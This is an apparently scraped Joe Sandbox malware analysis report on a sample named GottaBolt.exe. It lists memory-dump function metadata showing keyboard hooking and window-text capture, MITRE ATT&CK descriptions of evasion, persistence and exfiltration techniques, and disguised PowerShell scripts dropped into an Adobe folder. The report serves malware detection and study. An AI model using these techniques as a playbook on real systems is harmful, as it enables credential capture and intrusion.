Download Yara Rule

Strings

0@)I, xrefs: 00007FF84900443F
0@)I, xrefs: 00007FF849004514
0@)I, xrefs: 00007FF84900434C
0@)I, xrefs: 00007FF8490042F7
0@)I, xrefs: 00007FF849004588
B, xrefs: 00007FF84900454E
0@)I, xrefs: 00007FF8490044EB
0@)I, xrefs: 00007FF8490045D4

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 0@)I$0@)I$0@)I$0@)I$0@)I$0@)I$0@)I$B
API String ID: 0-2096621024
Opcode ID: cb970eadc2c70f11bd108d9fb92ded48f75416ad4dc7b8cc5f33a1931d47e761
Instruction ID: 58da0ddd54581ae20309b8bb34f6321afe5c4cef8689c4b21b2e9529601570d5
Opcode Fuzzy Hash: cb970eadc2c70f11bd108d9fb92ded48f75416ad4dc7b8cc5f33a1931d47e761
Instruction Fuzzy Hash: 6AE1E330E1DAC98FEBA9EF28A8556787BE1EF55350B0401FED04DC7193EA28EC468745

Function 00007FF849007C70 Relevance: 5.4, Strings: 4, Instructions: 413COMMON

Download Yara Rule

Strings

hG)I, xrefs: 00007FF849007E43
hG)I, xrefs: 00007FF849007D8D
hG)I, xrefs: 00007FF849007DC4
hG)I, xrefs: 00007FF849007F78

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: hG)I$hG)I$hG)I$hG)I
API String ID: 0-246359672
Opcode ID: 17c04be48e024e267c41994a4630016ae10cdac77c8f413f7d1310103b3ee519
Instruction ID: 91b1315def564ddf40f3786144dbbb7439ebbdb78911dfa00572b76b1c7c97ee
Opcode Fuzzy Hash: 17c04be48e024e267c41994a4630016ae10cdac77c8f413f7d1310103b3ee519
Instruction Fuzzy Hash: 6FC1353191EACD5FEBA9AB286C565B57BE1EF96250B0400FED04DC7093EA18EC068352

Analysis Process: powershell.exePID: 4428, Parent PID: 3228COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848F4C9D8 Relevance: 1.8, APIs: 1, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowTextW.USER32 ref: 00007FF848F4CBB6

Memory Dump Source

Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: d9a6c99197af96350017047bde3721df40069889db7c1598de273a1bddf13719
Instruction ID: 39bc6e54dd7706e2e28036a2e87afd148f2589ea292d835088ead2a2743ced45
Opcode Fuzzy Hash: d9a6c99197af96350017047bde3721df40069889db7c1598de273a1bddf13719
Instruction Fuzzy Hash: 3381C130518A898FDB69EF28C8457F937E0EF59750F00426EE84ED7292DB34A845CB85

Function 00007FF848F4B7E2 Relevance: 1.8, APIs: 1, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowTextW.USER32 ref: 00007FF848F4CBB6

Memory Dump Source

Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: fee74765c902fb74d380b863063e7613d37e4abb2b874dae9eb7640e281c687c
Instruction ID: 6c03381315dadeba9f70c9057b2cd041c5ca942148882ca0adc409cc1eaeb0a1
Opcode Fuzzy Hash: fee74765c902fb74d380b863063e7613d37e4abb2b874dae9eb7640e281c687c
Instruction Fuzzy Hash: A3819070518A4D8FEB68EF18C845BF937E0EB59750F00423EE84ED7292DB34A946CB85

Function 00007FF848F42755 Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF848F42841

Memory Dump Source

Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: db67c3ed396cbedaa99e3527b59f812a15c226863f0a44b18d8014c018a0e751
Instruction ID: 37e1cb4c2810b476c3404eba87abf2c20e1deaf90165715375917a02a71bb8dc
Opcode Fuzzy Hash: db67c3ed396cbedaa99e3527b59f812a15c226863f0a44b18d8014c018a0e751
Instruction Fuzzy Hash: 2D41393090CA898FDB19EB68D8466B97BE1FF66321F14027FD049D32D2CB74A852C785

Function 00007FF848F4C3F9 Relevance: 1.6, APIs: 1, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32 ref: 00007FF848F4C4CB

Memory Dump Source

Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 98047b2a1537baec7aa3d3d40e1008c3d275b72618d0d4d5800889001e796064
Instruction ID: f603e740ccac6d87e01b2b1224cc3cecabef47116fd39c7934747f68d354947e
Opcode Fuzzy Hash: 98047b2a1537baec7aa3d3d40e1008c3d275b72618d0d4d5800889001e796064
Instruction Fuzzy Hash: 3841093190DB884FD719DB68CC5A6B97FF0EF66711F04416FD08AC31A3CA68A806CB91

Function 00007FF848F4B7A2 Relevance: 1.6, APIs: 1, Instructions: 121
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32 ref: 00007FF848F4C4CB

Memory Dump Source

Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 4ad0b1a46a80b61652c42736f2876157d7c81d4fbeb619f993847dae8aa3b931
Instruction ID: 9f5b281513872086e296bfba5befc821149d740a3dbece254bf5bf2170641335
Opcode Fuzzy Hash: 4ad0b1a46a80b61652c42736f2876157d7c81d4fbeb619f993847dae8aa3b931
Instruction Fuzzy Hash: 7F31CA31A1CA188FDB18EF5CD84A6BD77E0EB69711F00413EE04AD3291DB74A855CB85

Function 00007FF849007B93 Relevance: .6, Instructions: 620
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798fd08b0dc107c4172a16769dae87e0014512bbe6591f7e188a5babb067d41e
Instruction ID: d28276e4590fbfd58ea57d9477c2cbc2647eca861c0281f22e3cd7818cdb6b04
Opcode Fuzzy Hash: 798fd08b0dc107c4172a16769dae87e0014512bbe6591f7e188a5babb067d41e
Instruction Fuzzy Hash: 10022631E0EAC94FE7A6AA386C552747FE1EF96660B0901FBD04DC7193E91CDC4A8352

Function 00007FF849002129 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e2e7e2cd4459933141db2adf4002bc856ca383f5a0f6d1e477bf3171c9e2f7
Instruction ID: d0f7746fefd25fb2d03d1ade8f223a601630d7a5ad665487b2baa4d2858f0d6e
Opcode Fuzzy Hash: 49e2e7e2cd4459933141db2adf4002bc856ca383f5a0f6d1e477bf3171c9e2f7
Instruction Fuzzy Hash: 1471F631E1EA8A5FFFA9AA2C68512B576D1EF55350F4801FED50EC31C3FE18E8054246

Function 00007FF849002224 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c73818f76bd953e69538076dc2cc88f9b60697642f5e097580cdf182c51b5ac
Instruction ID: 54aa54ed4909cf7633832bf169788ce18bb81183097d9eeea4ca4508bc325a8d
Opcode Fuzzy Hash: 7c73818f76bd953e69538076dc2cc88f9b60697642f5e097580cdf182c51b5ac
Instruction Fuzzy Hash: 92212331E1EA8A6FEBA9AA6C685127466D2EF94390F4800FAD00DC72C3FE1CEC454305

Function 00007FF849007DA0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ac728e4570c105584de6b7e4c5b1f88ca41ace21eb1fa0815491f77b776dd1
Instruction ID: dec3e2d2b259688ffb12edca75ceed480c2fd2aadb66ca1c9cf9b8d8e0aaeb4d
Opcode Fuzzy Hash: 02ac728e4570c105584de6b7e4c5b1f88ca41ace21eb1fa0815491f77b776dd1
Instruction Fuzzy Hash: 0921DA72F1FAD68FEAB569283C451755AD1EFC8BA0B4401F6C50EC3182FD0CEC160186

Function 00007FF849003165 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c0a9327d5f9b8da6a2c9e0a9ace6adfe159c38387d8259b799003c61a92894
Instruction ID: 767610a181b48952157ef6ad6efa164cf3405abee6ce5a50d3e398d60431df63
Opcode Fuzzy Hash: f8c0a9327d5f9b8da6a2c9e0a9ace6adfe159c38387d8259b799003c61a92894
Instruction Fuzzy Hash: 2601A132F0DD595FEAA6EA5C78015F9B392EF986A0B5401B7D10DC319AED18EC1183C4

Function 00007FF849004421 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7758a8f98f1308c0a992658c1519d3b92a82e6d3bf928f0867869cde1aefd1f
Instruction ID: aefb31a335a0ae13d3c26dff18722778f61131e34de7f93dac0886216ce38e80
Opcode Fuzzy Hash: c7758a8f98f1308c0a992658c1519d3b92a82e6d3bf928f0867869cde1aefd1f
Instruction Fuzzy Hash: EE01CE32F0D9694FEBA6EA5C68065F9B791EFA466074802F7C009C7193EE18AC1583C9

Function 00007FF8490030E9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451285a748266004a22df4068f94cf08e95b76ab83b8ad92654539e3a301d667
Instruction ID: 9ff0b52d326fad9b28a93d6a9cf83e363e9c4d602c0c518feef2aa5cb74f4747
Opcode Fuzzy Hash: 451285a748266004a22df4068f94cf08e95b76ab83b8ad92654539e3a301d667
Instruction Fuzzy Hash: 75F0C832F0ED991EFABAE62C24151F995D2EF88690F4841B7D50DC318AFD08DC154245

Function 00007FF8490043BE Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba953bac6a4d4232c76eced17e5ec190657f181b6aa6c3e548e442ff7ca654f4
Instruction ID: 0fb408c3888abad874976ecd80d7fbedf35b4ca86e5b46598050a8830e2eec1e
Opcode Fuzzy Hash: ba953bac6a4d4232c76eced17e5ec190657f181b6aa6c3e548e442ff7ca654f4
Instruction Fuzzy Hash: 32F05573E0FAAD0EE7B2F16C340A0EABE80EF646A074802F3C049C7162F900982803C5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GottaBolt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GottaBolt.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr0hxezn.wuz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0xfab2z.0nz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4n0wpwr.cc4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbkom40t.tn4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2tgwyaw.lhh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrnfigzy.bgi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0d15lmn.idb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4ci1jov.yec.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjnzhlvh.0gh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4sqkaty.q4w.psm1

C:\Users\user\AppData\Roaming\Adobe\YXuuqBFUVgMBaXsghdUv.txt

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1

C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1

Static File Info

Windows Analysis Report
GottaBolt.exe

Function 00007FF848F1E7DB Relevance: .9, Instructions: 904
COMMON

Function 00007FF848F148D6 Relevance: .5, Instructions: 469
COMMON

Function 00007FF848F15682 Relevance: .5, Instructions: 455
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre